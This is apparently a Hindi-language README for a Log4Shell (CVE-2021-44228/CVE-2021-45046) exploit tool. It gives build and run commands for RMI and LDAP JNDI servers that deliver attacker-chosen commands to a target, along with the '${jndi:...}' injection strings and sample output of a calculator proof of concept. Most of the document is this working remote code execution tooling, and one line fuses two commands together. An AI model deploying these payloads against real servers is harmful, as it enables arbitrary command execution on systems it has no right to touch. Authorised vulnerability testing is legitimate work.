
यह प्रोजेक्ट Log4j CVE-2021-44228 भेद्यता के परीक्षण में मदद करेगा।
यह परियोजना Log4j CVE‑2021‑44228/CVE‑2021‑45046 कमजोरियों का परीक्षण करने में मदद करेगी।
Java 1.8+ और Maven 3.x+ की आवश्यकता है
mvn clean package -DskipTestsjava -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>
आपको अब Exploit.class होस्ट करने की आवश्यकता नहीं है। ऐप संकेतित पोर्ट पर एक HTTP सर्वर शुरू करेगा।
आपको लक्ष्य में चलाने के लिए कमांड बताना होगा।
Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}
java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>
आपको अब Exploit.class होस्ट करने की आवश्यकता नहीं है। ऐप संकेतित पोर्ट पर एक HTTP सर्वर शुरू करेगा।
आपको लक्ष्य में चलाने के लिए कमांड बताना होगा।
Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}
java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>
Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -